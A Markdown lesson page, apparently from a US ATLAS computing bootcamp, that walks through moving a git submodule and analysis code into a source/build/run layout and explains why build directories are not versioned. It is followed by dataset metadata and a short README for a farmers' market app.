Start by creating the necessary directories.
~~~shell
mkdir source/
mkdir build/
mkdir run/
~~~
{: .language-bash}
Then you should move your `JetSelectionHelper` package into the `source/` directory. Unfortunately, the version of git inside the docker image is quite old (a common theme with ATLAS software, stability is key for our experiment!) and does not yet include the ability to move git submodules. There is a manual way to do this by editing several files inside `.git/`, but that is outside the scope of this tutorial. Instead we will remove the old `JetSelectionHelper` submodule and re-add it as `source/JetSelectionHelper`. Since the `JetSelectionHelper` lives inside its own repository, you will not lose any of the change history by doing so.
Start by removing the work tree of your submodule from your local git repository.
~~~shell
git submodule deinit JetSelectionHelper
~~~
{: .language-bash}
To remove the reference to the submodule, you need manually edit the `.gitmodule` file and delete the following section.
~~~
[submodule "JetSelectionHelper"]
path = JetSelectionHelper
url = https://gitlab.cern.ch/usatlas-computing-bootcamp-2021/JetSelectionHelper.git
~~~
{: .source}
Finally remove the directory itself from git's index.
~~~shell
git rm JetSelectionHelper
~~~
{: .language-bash}
After these three steps, your git repository will no longer know about the `JetSelectionHelper` submodule.
Next make a fork of the [JetSelectionHelper repository](https://gitlab.cern.ch/usatlas-computing-bootcamp-2021/JetSelectionHelper). You will be making a few modifications. Add it as a submodule under the `source/` directory. Don't forget to replace `${USER}` with your GitLab username!
~~~shell
git submodule add ssh://git@gitlab.cern.ch:7999/${USER}/JetSelectionHelper.git source/JetSelectionHelper
~~~
{: .language-bash}
The last step is to move the `AnalysisPayload` codebase into a new package with the same name. This can be done simply by using the `git mv` command that you might have learned about yesterday. The following block of commands will move everything into the structure described earlier.
~~~shell
mkdir source/AnalysisPayload
mkdir source/AnalysisPayload/util
git mv AnalysisPayload.cxx source/AnalysisPayload/util/
git rm CMakeLists.txt
rm source/JetSelectionHelper/CMakeLists.txt
~~~
{: .language-bash}
The list of changes to your repository should look like the following. Make sure to commit everything before moving to the next step! Don't worry about the modified content (missing `CMakeLists.txt`) inside the `JetSelectionHelper` for now.
```bash
# On branch master
# Changes to be committed:
# (use "git reset HEAD <file>..." to unstage)
#
# modified: .gitmodules
# deleted: CMakeLists.txt
# renamed: AnalysisPayload.cxx -> source/AnalysisPayload/util/AnalysisPayload.cxx
# renamed: JetSelectionHelper -> source/JetSelectionHelper
#
# Changes not staged for commit:
# (use "git add <file>..." to update what will be committed)
# (use "git checkout -- <file>..." to discard changes in working directory)
# (commit or discard the untracked or modified content in submodules)
#
# modified: source/JetSelectionHelper (modified content)
#
```
> ## Tracking the build/ Directory
>
> Notice that we did not at any point add the `build/` directory to the repository index. You should never version the contents this directory. Why?
>
> > ## Solution
> >
> > There are two important reasons:
> > - Git reduces the history size by storying only the differences between file versions. For binary files, which is what `build/` mostly contains, finding the differences is more complicated. Thus by default, will store the entire binary file anytime you make a change. This will blow up the size of your repository by a lot.
> > - Some of the files contain information custom to the user's environment (ie: compiler, location of libraries). By versioning these files, you will clutter the history by tracking changes that are not relevent to the execution of the code.
> >
> > If you ever commit the `build/` directory, bad things will happen to you!
> {: .solution}
{: .challenge}
{% include links.md %}
| 42.943262 | 642 | 0.753757 | eng_Latn | 0.994798 |
9a6a3f5b89fcb60c61bad120845c517ddffeaf3d | 442 | md | Markdown | README.md | silky/grownbyus | ce4816e8a2dc40ad49ee9a3dfdf5c6653ddd35a6 | [
"MIT"
] | 1 | 2019-06-27T11:32:38.000Z | 2019-06-27T11:32:38.000Z | README.md | silky/grownbyus | ce4816e8a2dc40ad49ee9a3dfdf5c6653ddd35a6 | [
"MIT"
] | null | null | null | README.md | silky/grownbyus | ce4816e8a2dc40ad49ee9a3dfdf5c6653ddd35a6 | [
"MIT"
] | null | null | null | Grown By Us [](https://waffle.io/MindKitchen/grownbyus) [](https://gitter.im/MindKitchen/grownbyus?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)
===========
A virtual farmers' market designed to encourage neighbors to grow, sell and trade food in their own back yards.
| 88.4 | 316 | 0.771493 | yue_Hant | 0.622737 |